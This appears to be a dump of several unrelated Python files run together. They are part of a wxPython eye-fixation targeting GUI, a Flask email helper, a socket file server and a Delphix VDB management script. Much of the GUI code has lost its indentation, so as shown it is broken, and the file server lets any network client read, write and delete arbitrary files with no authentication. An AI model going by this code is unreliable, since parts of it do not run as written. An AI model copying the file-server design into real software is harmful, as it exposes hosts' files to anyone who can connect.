self.Bind(wx.EVT_MENU, self.on_open_protocol_file, id=self.id_open_proto)
protoMenu.Append(self.id_clear_proto, 'Clear Protocol\t')
self.Bind(wx.EVT_MENU, self.on_clear_protocol, id=self.id_clear_proto)
# Open a background image
fileMenu.Append(wx.ID_OPEN, 'Open Background Image...\tCtrl+B')
self.Bind(wx.EVT_MENU, self.on_open_background_image, id=wx.ID_OPEN)
# self.Bind(wx.EVT_MENU,sel)
fileMenu.Append(wx.ID_SAVE, 'Save Fixation Image...\tCtrl+I')
self.Bind(wx.EVT_MENU, self.on_save_fixation_image, id=wx.ID_SAVE)
fileMenu.AppendSeparator()
fileMenu.Append(wx.ID_PREFERENCES, 'Preferences')
self.Bind(wx.EVT_MENU, self.on_preferences, id=wx.ID_PREFERENCES)
fileMenu.Append(wx.ID_EXIT, 'Exit\tCtrl+Q')
self.Bind(wx.EVT_MENU, self.on_quit, id=wx.ID_EXIT)
# Toggle on/off
self.toggleMenu = wx.Menu()
self.on_toggle = self.toggleMenu.AppendRadioItem(self.id_on_toggle, 'Yes')
self.Bind(wx.EVT_MENU, self.on_toggle_press, self.on_toggle)
self.off_toggle = self.toggleMenu.AppendRadioItem(self.id_off_toggle, 'No')
self.Bind(wx.EVT_MENU, self.on_toggle_press, self.off_toggle)
targetMenu.AppendSubMenu(self.toggleMenu,'Visible')
# Alignment
self.alignMenu = wx.Menu()
self.off_align = self.alignMenu.AppendRadioItem(self.id_off_align, 'Off')
        self.Bind(wx.EVT_MENU, self.on_align_press, self.off_align)
        self.on_align = self.alignMenu.AppendRadioItem(self.id_on_align, 'On')
        self.Bind(wx.EVT_MENU, self.on_align_press, self.on_align)
targetMenu.AppendSubMenu(self.alignMenu, 'Alignment')
# Grid
self.gridMenu = wx.Menu()
self.off_grid = self.gridMenu.AppendRadioItem(self.id_off_grid, 'Off')
self.Bind(wx.EVT_MENU, self.on_grid_press, self.off_grid)
self.on_grid = self.gridMenu.AppendRadioItem(self.id_on_grid, 'On')
self.Bind(wx.EVT_MENU, self.on_grid_press, self.on_grid)
targetMenu.AppendSubMenu(self.gridMenu, 'Grid')
# Compounds the Menu Bar
self.SetMenuBar(menubar)
def get_minor_increment(self):
return self.MINOR_INCREMENT
def get_major_increment(self):
return self.MAJOR_INCREMENT
def get_vertical_fov(self):
return self.viewpane.get_v_fov()
def get_horizontal_fov(self):
return self.viewpane.get_h_fov()
def on_preferences(self, event):
prefs_dialog = PreferencesDialog(self,
major_increment=self.get_major_increment(),
minor_increment=self.get_minor_increment())
retcon = prefs_dialog.ShowModal()
if retcon == 1:
prefs = prefs_dialog.get_prefs()
self.set_major_increment(prefs['major_increment'])
self.set_minor_increment(prefs['minor_increment'])
def handle_message(self, evt):
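        # Dispatch incoming socket messages by their datatype code:
        # -1 -> quit, 0 -> mark the current location, 1 -> set the FOV.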
switchboard = {
-1: self.on_quit,
0: self.mark_location,
1: self.set_FOV
}
if evt.get_datatype() in switchboard:
switchboard.get(evt.get_datatype())(evt.get_data())
# Toggle target on/off
def on_toggle_press(self, event):
if event.Id == self.id_on_toggle:
self.LCCanvas.show_fixation(True)
elif event.Id == self.id_off_toggle:
self.LCCanvas.show_fixation(False)
# Alignment
    def on_align_press(self, event):
pass
# Grid
def on_grid_press(self, event):
if event.Id == self.id_on_grid:
self.prev_cursor = self.LCCanvas.set_fixation_cursor(4)
print(str(self.prev_cursor))
elif event.Id == self.id_off_grid:
self.LCCanvas.set_fixation_cursor(self.prev_cursor)
# End of Menu Bar
def on_rotation_slider(self, rotation):
self.viewpane.SetBkgrdRotate(rotation)
def on_mouse_motion(self, event):
pos = event.GetPosition()
self.viewpane.set_mouse_loc(pos, self._eyesign)
        if event.LeftIsDown():
# Convert to degrees
self.horz_loc, self.vert_loc = self.viewpane.to_degrees(pos)
self.update_fixation_location()
        elif event.RightIsDown() and self.viewpane.get_state() == 1:
self.viewpane.set_bkgrd_pan(pos)
def on_left_mouse_button(self, event):
pos = event.GetPosition()
self.viewpane.set_mouse_loc(pos, self._eyesign)
# Convert to degrees
self.horz_loc, self.vert_loc = self.viewpane.to_degrees(pos)
self.update_fixation_location()
# To ensure we capture the initial offset from the origin of the image during a panning movement.
def on_right_mouse_button(self, event):
pos = event.GetPosition()
if event.RightDown():
            self.viewpane.SetMouseOffset(wx.Point2D(pos.x, pos.y))
elif event.RightUp():
self.viewpane.SetMouseOffset(None)
def on_mouse_wheel(self, event):
        if self.viewpane.get_state() in (1, 2):
            self.viewpane.SetBkgrdScale(math.copysign(1.0, event.GetWheelRotation()) * .01)
def on_button_press(self, evt):
button = evt.GetEventObject()
# If the user clicked on Select Image
if button is self.control._iminitpane.selectim:
self.on_open_background_image(None)
elif button is self.control._iminitpane.initalign:
state = self.viewpane.get_state() + 1
if state == 2:
self.viewpane.SetPanAnchor()
elif state == 3: # If they hit the button after the initialization, restart the process.
state = 0
# Update the states in the two panels
self.control.SetState(state)
self.viewpane.set_state(state)
else:
pass
def update_fixation_location(self, degrees=None):
# If you don't pass in degrees as an argument,
# then assume that we're using whatever the current degrees are.
if degrees is None:
degrees = wx.Point2D(self.horz_loc, self.vert_loc)
else:
self.horz_loc = degrees.x
self.vert_loc = degrees.y
# Update the respective GUIs
self.viewpane.set_fix_loc_in_deg(degrees)
self.control.vertcontrol.SetValue(degrees.y)
self.control.horzcontrol.SetValue(degrees.x)
x, y = self.degrees_to_screenpix(degrees.x, degrees.y)
self.LCCanvas.set_fixation_location(wx.Point2D(x, y))
def set_major_increment(self, increment):
self.MAJOR_INCREMENT = increment
def set_minor_increment(self, increment):
self.MINOR_INCREMENT = increment
def set_vertical_fov(self, degrees):
self.viewpane.set_v_fov(degrees)
def set_horizontal_fov(self, degrees):
self.viewpane.set_h_fov(degrees)
def on_save_fixation_image(self, evt=None):
dialog = wx.FileDialog(self, 'Save Fixation Display as:', "", "", 'PNG Image (*.png)|*.png', wx.FD_SAVE)
if dialog.ShowModal() == wx.ID_OK:
locationpath = dialog.GetDirectory()
locationfname = dialog.GetFilename()
dialog.Destroy()
self.viewpane.pane_to_file(locationpath + os.sep + locationfname)
def on_set_save_protocol_location(self, evt=None):
# If it doesn't exist, then prompt for the location before continuing...
dialog = wx.FileDialog(self, 'Save Location List As:', "", "", 'CSV (Comma delimited)|*.csv', wx.FD_SAVE)
if dialog.ShowModal() == wx.ID_OK:
self._locationpath = dialog.GetDirectory()
self._locationfname = dialog.GetFilename()
dialog.Destroy()
result = wx.ID_YES
if os.path.isfile(self._locationpath + os.sep + self._locationfname):
md = wx.MessageDialog(self, "Protocol file already exists! Overwrite?", "Protocol file already exists!",
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
result = md.ShowModal()
if result == wx.ID_YES:
self._locfileobj = open(self._locationpath + os.sep + self._locationfname, 'w') # Write the header
self._locfileobj.write("v0.1,Horizontal Location,Vertical Location,Horizontal FOV,Vertical FOV,Eye\n")
self._locfileobj.close()
def on_open_protocol_file(self, evt=None):
dialog = wx.FileDialog(self, 'Select protocol file:', self.header_dir, '',
'CSV files (*.csv)|*.csv', wx.FD_OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.header_dir = dialog.GetDirectory()
protofname = dialog.GetFilename()
dialog.Destroy()
protopath = self.header_dir + os.sep + protofname
result = wx.ID_NO
if not self.protocolpane.is_protocol_empty():
md = wx.MessageDialog(self, "Protocol already exists! Overwrite or Append to existing protocol?",
"Protocol already exists!", wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
md.SetYesNoCancelLabels("Overwrite", "Append", "Cancel")
result = md.ShowModal()
if result == wx.ID_YES:
self.protocolpane.clear_protocol()
self.viewpane.clear_locations()
self.protocolpane.load_protocol(protopath)
elif result == wx.ID_NO:
self.protocolpane.load_protocol(protopath)
## self.update_protocol(self.vert_loc,self.horz_loc)
def on_clear_protocol(self, evt=None):
dlg = wx.MessageDialog(None, 'Are you sure you want to clear the protocol?', 'Clear Protocol',
wx.YES_NO | wx.ICON_QUESTION)
result = dlg.ShowModal()
if result == wx.ID_YES:
self.protocolpane.clear_protocol()
self.viewpane.clear_locations()
self._locationfname = None
def on_open_background_image(self, evt=None):
dialog = wx.FileDialog(self, 'Select background image:', self.header_dir, self.filename,
'Image files (*.jpg,*.jpeg,*.bmp,*.png,*.tif,*.tiff)| *.jpg;*.jpeg;*.bmp;*.png;*.tif;*.tiff|' +
'JP(E)G images (*.jpg,*.jpeg)|*.jpg;*.jpeg|BMP images (*.bmp)|*.bmp' +
'|PNG images (*.png)|*.png|TIF(F) images (*.tif,*.tiff)|*.tif;*.tiff', wx.FD_OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.header_dir = dialog.GetDirectory()
self.filename = dialog.GetFilename()
dialog.Destroy()
impath = self.header_dir + os.sep + self.filename
            bkgrdim = wx.Bitmap(1, 1)
bkgrdim.LoadFile(impath, wx.BITMAP_TYPE_ANY)
self.viewpane.set_bkgrd(bkgrdim)
def degrees_to_screenpix(self, deghorz, degvert):
# Converts Degrees to Screen Pixels - X should be POSITIVE going left on screen for OD
x = -deghorz * self.SCREEN_PPD
y = -degvert * self.SCREEN_PPD
return x, y
def on_keyboard_press(self, event):
# Allows For Arrow Control Of The Cursor
if event.GetKeyCode() == wx.WXK_F4:
evt = MessageEvent(myEVT_RETURN_MESSAGE, -1, 4, "F4")
wx.PostEvent(self, evt)
# elif event.GetKeyCode() == wx.WXK_NUMPAD_SUBTRACT:
# self.zoom_out(self)
if self.viewpane.align_on is True:
self.on_image_alignment(event)
elif self.viewpane.align_on is False:
self.on_move_fixation(event)
def on_image_alignment(self, event):
if event.ControlDown(): # The image can only be moved if Control is being held down!
if event.GetKeyCode() == wx.WXK_DOWN:
self.viewpane.pan_y = self.viewpane.pan_y + self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_UP:
self.viewpane.pan_y = self.viewpane.pan_y - self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_LEFT:
self.viewpane.pan_x = self.viewpane.pan_x - self.MINOR_INCREMENT
self.viewpane.int_Graph()
elif event.GetKeyCode() == wx.WXK_RIGHT:
self.viewpane.pan_x = self.viewpane.pan_x + self.MINOR_INCREMENT
self.viewpane.int_Graph()
else:
self.on_move_fixation(event)
event.Skip()
def on_move_fixation(self, event):
if event.GetKeyCode() == wx.WXK_DOWN:
if event.ShiftDown():
self.vert_loc = self.vert_loc - self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.vert_loc = self.vert_loc - self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_UP:
if event.ShiftDown():
self.vert_loc = self.vert_loc + self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.vert_loc = self.vert_loc + self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_LEFT:
if event.ShiftDown():
self.horz_loc = self.horz_loc - self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.horz_loc = self.horz_loc - self.MAJOR_INCREMENT
self.update_fixation_location()
elif event.GetKeyCode() == wx.WXK_RIGHT:
if event.ShiftDown():
self.horz_loc = self.horz_loc + self.MINOR_INCREMENT
self.update_fixation_location()
else:
self.horz_loc = self.horz_loc + self.MAJOR_INCREMENT
self.update_fixation_location()
else:
event.Skip()
def on_eye_select(self, event):
        # Changes cursor and location names based on the selected eye
        state = self.control.OS.GetValue()
        if state:  # If it is OS, eyesign is -1
self._eyesign = -1
self.r_text.SetLabel('T\ne\nm\np\no\nr\na\nl')
self.l_text.SetLabel(' \n \nN\na\ns\na\nl\n \n')
self.control.horzcontrol.flip_labels()
self.update_fixation_location()
        else:  # If it is OD, eyesign is 1
self._eyesign = 1
self.r_text.SetLabel(' \n \nN\na\ns\na\nl\n \n')
self.l_text.SetLabel('T\ne\nm\np\no\nr\na\nl')
self.control.horzcontrol.flip_labels()
self.update_fixation_location()
def on_minor_step(self, event):
self.MINOR_INCREMENT = self.control.minorStep.GetValue()
self.control.horzcontrol.SetIncrement(self.MINOR_INCREMENT)
self.control.vertcontrol.SetIncrement(self.MINOR_INCREMENT)
def on_major_step(self, event):
self.MAJOR_INCREMENT = self.control.majorStep.GetValue()
def on_vert_spin(self, event):
# Entering a vertical location value using the subclass
y_ent = self.control.vertcontrol.GetValue()
self.vert_loc = round(float(y_ent), 2)
self.update_fixation_location()
def on_horz_spin(self, event):
# Entering a horizontal location value using the subclass
x_ent = self.control.horzcontrol.GetValue()
self.horz_loc = round(float(x_ent), 2)
self.update_fixation_location()
def mark_location(self, data):
        # Marks the current location of the fixation target, and dumps it to a file
self.viewpane.mark_location()
self.update_protocol(self.control.horzcontrol.get_label_value(), self.control.vertcontrol.get_label_value())
self.save_location(self.control.horzcontrol.get_value(), self.control.vertcontrol.get_value(), str(data))
def set_FOV(self, fov):
if fov != -1:
self.viewpane.set_fov(fov)
def update_fixation_color(self, penColor, brushColor):
# This method allows the user to change the color on the LightCrafter DLP.
self.LCCanvas.set_fixation_color(penColor, brushColor)
def update_fixation_cursor(self, cursor):
# This method allows the user to change the cursor type on the LightCrafter DLP.
self.LCCanvas.set_fixation_cursor(cursor)
def update_fixation_cursor_size(self, size):
# This method allows the user to change the cursor size on the LightCrafter DLP.
self.LCCanvas.set_fixation_size(size)
def reset_fixation_location(self, event):
# Reset fixation target Location
self.horz_loc = 0.0
self.vert_loc = 0.0
self.update_fixation_location()
def update_protocol(self, horzloc, vertloc):
# Send a query to our protocol pane, marking a new location if there is one or fulfilling a protocol requirement
self.protocolpane.update_protocol(
(self.control.horzcontrol.get_label_value(), self.control.vertcontrol.get_label_value()), self._eyesign,
self.viewpane.get_fov())
def save_location(self, horzloc, vertloc, vidnum="-1"):
# Create a file that we will dump all of the relevant information to
if self._locationfname is None:
# If it doesn't exist, then prompt for the location before continuing...
self.on_set_save_protocol_location()
try:
self._locfileobj = open(self._locationpath + os.sep + self._locationfname, 'a')
except IOError: # If there is an exception, then the file is already open, or is being written to
if self._locfileobj.closed:
pass
## print "Failed to open location dump file!"
return
else:
pass
## print "File is already open, continuing..."
if self._eyesign == -1:
eye = "OS"
else:
eye = "OD"
print(vidnum)
self._locfileobj.write(str(vidnum) + "," + str(horzloc) + "," + str(vertloc) + "," +
str(self.viewpane.get_h_fov()) + "," + str(self.viewpane.get_v_fov()) +
"," + eye + "\n")
self._locfileobj.close()
# Saves The Aligned ViewPane
def save_viewpane(self, event):
context = wx.ClientDC(self.imagespace)
memory = wx.MemoryDC()
x, y = self.imagespace.ClientSize
        bitmap = wx.Bitmap(x, y)
memory.SelectObject(bitmap)
memory.Blit(0, 0, x, y, context, 0, 0)
memory.SelectObject(wx.NullBitmap)
wx.InitAllImageHandlers()
self.filename = ''
        dialog = wx.FileDialog(self, 'Save Aligned ViewPane As:', self.save_image_dir, self.filename, '*.jpeg*',
                               wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dialog.ShowModal() == wx.ID_OK:
self.save_image_dir = dialog.GetDirectory()
self.filename = dialog.GetFilename()
dialog.Destroy()
bitmap.SaveFile(self.filename + '.jpeg', wx.BITMAP_TYPE_JPEG)
# Exits The Application
    def on_quit(self, event=None):
self.LCCanvas.Destroy()
self.Destroy()
class MessageEvent(wx.PyCommandEvent):
"""Event to signal that a count value is ready"""
def __init__(self, etype, eid, datatype=-1, data=-1):
"""Creates the event object"""
wx.PyCommandEvent.__init__(self, etype, eid)
self._datatype = datatype
self._data = data
def get_datatype(self):
return self._datatype
def get_data(self):
return self._data
# This thread class generically listens to a queue, and passes what it receives to a specified function.
class ConnListener(asyncore.dispatcher):
def __init__(self, parent):
asyncore.dispatcher.__init__(self)
self.thisparent = parent
self.HOST = 'localhost'
self.PORT = 1222
self.buffer = []
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.bind((self.HOST, self.PORT))
print("Listening for a careless whisper from a queue thread...")
self.listen(1)
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
QueueListener(self.thisparent, sock=sock)
print("Incoming connection from " + repr(addr))
class QueueListener(asyncore.dispatcher_with_send):
    def __init__(self, parent=None, sock=None, map=None):
        asyncore.dispatcher_with_send.__init__(self, sock, map)
        self.thisparent = parent
        self.thisparent.Bind(EVT_RETURN_MESSAGE, self.handle_return_message)
def handle_return_message(self, evt):
# print("Sending!")
self.send(evt.get_data().encode("utf-8"))
def handle_read(self):
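        # Wire format: '!'-delimited messages, each 'datatype;payload'.
        # A datatype of -1 tells us to close the connection.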
try:
recvmsg = self.recv(32).decode("utf-8")
# print("Recieved: "+recvmsg)
list_o_msg = recvmsg.split("!")
for msg in list_o_msg:
if msg:
# print("Parsing: " + msg)
splitmsg = msg.split(";")
if len(splitmsg) == 2:
evt = MessageEvent(myEVT_MESSAGE, -1, int(splitmsg[0]), splitmsg[1])
else:
evt = MessageEvent(myEVT_MESSAGE, -1, int(splitmsg[0]), splitmsg[1:])
wx.PostEvent(self.thisparent, evt)
if int(splitmsg[0]) == -1:
self.close()
return
except ConnectionResetError:
print("Lost connection to the image whisperer!")
md = wx.MessageDialog(None, "Lost connection to the image whisperer! Protocol list will no longer update.",
"Lost connection to the image whisperer!", wx.ICON_ERROR | wx.OK)
md.ShowModal()
return
# Shows The Window
if __name__ == '__main__':
app = wx.App(redirect=False)
frame = wxFixationFrame(None)
frame.Show()
app.MainLoop()
|
email.py
|
from threading import Thread
# from flask.ext.mail import Message
from flask_mail import Message
from app import app, mail
def send(recipient, subject, body):
    '''
    Send a mail to a recipient. The body is usually a rendered HTML template.
    The sender's credentials have been configured in the config.py file.
    '''
sender = app.config['ADMINS'][0]
message = Message(subject, sender=sender, recipients=[recipient])
message.html = body
# Create a new thread
thr = Thread(target=send_async, args=[app, message])
thr.start()
def send_async(app, message):
''' Send the mail asynchronously. '''
with app.app_context():
mail.send(message)
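# Hypothetical usage sketch (assumes a configured Flask-Mail instance and a
# rendered template; not part of the original module):
#     send('user@example.com', 'Welcome!', render_template('welcome.html'))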
|
socket_file_server.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2018 NSF Center for Space, High-performance, and Resilient Computing (SHREC)
University of Pittsburgh. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided
that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
OF SUCH DAMAGE.
"""
from socket import AF_INET, SOCK_STREAM, socket
from threading import Thread
from os import remove
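# Wire protocol: the receive server (port 60124) expects one connection that
# sends the file name terminated by '\n', then a second connection streaming
# the raw bytes. The send server (port 60123) reads 'name[ -r]\n' and replies
# with the file contents on the same connection ('-r' deletes after sending).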
def receive_server():
with socket(AF_INET, SOCK_STREAM) as sock:
sock.bind(('', 60124))
sock.listen(5)
while True:
connection, address = sock.accept()
file_to_receive = connection.recv(4096).decode('utf-8', 'replace')
while '\n' not in file_to_receive:
file_to_receive += connection.recv(4096).decode('utf-8',
'replace')
file_to_receive = file_to_receive.split('\n')[0]
connection.close()
connection, address = sock.accept()
            with open(file_to_receive, 'wb') as outfile:
                data = connection.recv(4096)
                while data:
                    outfile.write(data)
                    data = connection.recv(4096)
connection.close()
def send_server():
with socket(AF_INET, SOCK_STREAM) as sock:
sock.bind(('', 60123))
sock.listen(5)
while True:
connection, address = sock.accept()
file_to_send = connection.recv(4096).decode('utf-8', 'replace')
while '\n' not in file_to_send:
file_to_send += connection.recv(4096).decode('utf-8', 'replace')
file_to_send = file_to_send.split('\n')[0]
if ' ' in file_to_send:
args = file_to_send.split(' ')
file_to_send = args[0]
delete = args[1] == '-r'
else:
delete = False
try:
with open(file_to_send, 'rb') as data:
connection.sendall(data.read())
            except OSError:
print('socket_file_server.py: could not open file:',
file_to_send)
else:
try:
if delete:
remove(file_to_send)
print('socket_file_server.py: deleted file:',
file_to_send)
                except OSError:
print('socket_file_server.py: could not delete file:',
file_to_send)
finally:
connection.close()
Thread(target=receive_server).start()
Thread(target=send_server).start()
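# A minimal client sketch for the receive server above (hypothetical helper,
# not part of the original script; defined but never called here):
def _example_send_file(host, filename):
    # First connection announces the destination file name.
    with socket(AF_INET, SOCK_STREAM) as sock:
        sock.connect((host, 60124))
        sock.sendall((filename + '\n').encode('utf-8'))
    # Second connection streams the raw file bytes.
    with socket(AF_INET, SOCK_STREAM) as sock:
        sock.connect((host, 60124))
        with open(filename, 'rb') as data:
            sock.sendall(data.read())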
|
dx_operations.py
|
#!/usr/bin/env python
# Corey Brune - Oct 2016
# This script starts or stops a VDB
# requirements
# pip install docopt delphixpy
# The below doc follows the POSIX compliant standards and allows us to use
# this doc to also define our arguments for the script.
"""List all VDBs or Start, stop, enable, disable a VDB
Usage:
dx_operations_vdb.py (--vdb <name> [--stop | --start | --enable | --disable] | --list | --all_dbs <name>)
[-d <identifier> | --engine <identifier> | --all]
[--debug] [--parallel <n>] [--poll <n>]
[--config <path_to_file>] [--logdir <path_to_file>]
dx_operations_vdb.py -h | --help | -v | --version
List all VDBs, start, stop, enable, disable a VDB
Examples:
dx_operations_vdb.py --engine landsharkengine --vdb testvdb --stop
dx_operations_vdb.py --vdb testvdb --start
dx_operations_vdb.py --all_dbs enable
dx_operations_vdb.py --all_dbs disable
dx_operations_vdb.py --list
Options:
--vdb <name> Name of the VDB to stop or start
  --start                   Start the VDB
--stop Stop the VDB
--all_dbs <name> Enable or disable all dSources and VDBs
--list List all databases from an engine
--enable Enable the VDB
--disable Disable the VDB
-d <identifier> Identifier of Delphix engine in dxtools.conf.
  --engine <identifier>     Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_operations_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
VERSION = 'v.0.3.015'
import sys
from os.path import basename
from time import sleep, time
import traceback
from delphixpy.exceptions import HttpError
from delphixpy.exceptions import JobError
from delphixpy.exceptions import RequestError
from delphixpy.web import database
from delphixpy.web import job
from delphixpy.web import source
from delphixpy.web.capacity import consumer
from docopt import docopt
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxLogging import print_exception
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_all_objects
from lib.GetReferences import find_obj_list
from lib.GetSession import GetSession
def dx_obj_operation(dlpx_obj, vdb_name, operation):
"""
Function to start, stop, enable or disable a VDB
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param vdb_name: Name of the object to stop/start/enable/disable
:type vdb_name: str
:param operation: enable or disable dSources and VDBs
:type operation: str
"""
print_debug('Searching for {} reference.\n'.format(vdb_name))
    engine_name = list(dlpx_obj.dlpx_engines.keys())[0]
vdb_obj = find_obj_by_name(dlpx_obj.server_session, source, vdb_name)
try:
if vdb_obj:
if operation == 'start':
source.start(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'stop':
source.stop(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'enable':
source.enable(dlpx_obj.server_session, vdb_obj.reference)
elif operation == 'disable':
source.disable(dlpx_obj.server_session,
vdb_obj.reference)
dlpx_obj.jobs[engine_name] = dlpx_obj.server_session.last_job
    except (RequestError, HttpError, JobError, AttributeError) as e:
        print_exception('An error occurred while performing {} on {}:\n'
                        '{}'.format(operation, vdb_name, e))
    print('{} was successfully performed on {}.'.format(operation, vdb_name))
def all_databases(dlpx_obj, operation):
"""
Enable or disable all dSources and VDBs on an engine
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param operation: enable or disable dSources and VDBs
:type operation: str
"""
for db in database.get_all(dlpx_obj.server_session):
try:
dx_obj_operation(dlpx_obj, db.name, operation)
except (RequestError, HttpError, JobError):
pass
        print('{} {}\n'.format(operation, db.name))
sleep(2)
def list_databases(dlpx_obj):
"""
Function to list all databases for a given engine
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
source_stats_lst = find_all_objects(dlpx_obj.server_session, source)
is_dSource = None
try:
for db_stats in find_all_objects(dlpx_obj.server_session,
consumer):
source_stats = find_obj_list(source_stats_lst, db_stats.name)
if source_stats is not None:
if source_stats.virtual is False:
is_dSource = 'dSource'
elif source_stats.virtual is True:
is_dSource = db_stats.parent
print('name: {},provision container: {},database disk '
'usage: {:.2f} GB,Size of Snapshots: {:.2f} GB,'
'Enabled: {},Status:{},'.format(str(db_stats.name),
str(is_dSource),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024,
source_stats.runtime.enabled,
source_stats.runtime.status))
elif source_stats is None:
print('name = {},provision container= {},database disk '
'usage: {:.2f} GB,Size of Snapshots: {:.2f} GB,'
'Could not find source information. This could be a '
'result of an unlinked object'.format(
str(db_stats.name), str(db_stats.parent),
db_stats.breakdown.active_space / 1024 / 1024 / 1024,
db_stats.breakdown.sync_space / 1024 / 1024 / 1024))
except (RequestError, JobError, AttributeError, DlpxException) as e:
        print('An error occurred while listing databases: {}'.format(e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine, dlpx_obj):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
The @run_async decorator allows us to run against multiple Delphix Engine
simultaneously
:param engine: Dictionary of engines
:type engine: dictionary
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
try:
# Setup the connection to the Delphix Engine
dlpx_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
        print_exception('ERROR: Engine {} encountered an error while '
                        'establishing a session:\n{}\n'.format(
                            engine['hostname'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dlpx_obj.job_mode(single_thread):
while len(dlpx_obj.jobs) > 0 or len(thingstodo) > 0:
                if len(thingstodo) > 0:
if arguments['--start']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'start')
elif arguments['--stop']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'stop')
elif arguments['--enable']:
dx_obj_operation(dlpx_obj, arguments['--vdb'], 'enable')
elif arguments['--disable']:
dx_obj_operation(dlpx_obj, arguments['--vdb'],
'disable')
elif arguments['--list']:
list_databases(dlpx_obj)
elif arguments['--all_dbs']:
all_databases(dlpx_obj, arguments['--all_dbs'])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
                for j in list(dlpx_obj.jobs.keys()):
job_obj = job.get(dlpx_obj.server_session, dlpx_obj.jobs[j])
print_debug(job_obj)
                    print_info('{}: Job state: {}'.format(
                        engine['hostname'], job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the running jobs list.
del dlpx_obj.jobs[j]
                    elif job_obj.job_state == 'RUNNING':
# If the job is in a running state, increment the
# running job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dlpx_obj.jobs) > 0:
sleep(float(arguments['--poll']))
except (DlpxException, RequestError, JobError, HttpError) as e:
        print_exception('Error in dx_operations_vdb: {}\n{}'.format(
            engine['hostname'], e))
sys.exit(1)
def time_elapsed(time_start):
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
:param time_start: start time of the script.
:type time_start: float
"""
    return round((time() - time_start) / 60, 1)
def run_job(dlpx_obj, config_file_path):
"""
This function runs the main_workflow aynchronously against all the
servers specified
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
:param config_file_path: string containing path to configuration file.
:type config_file_path: str
"""
# Create an empty list to store threads we create.
threads = []
engine = None
# If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info('Executing against all Delphix Engines in the dxtools.conf')
try:
# For each server in the dxtools.conf...
for delphix_engine in dlpx_obj.dlpx_engines:
engine = dlpx_obj.dlpx_engines[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine, dlpx_obj))
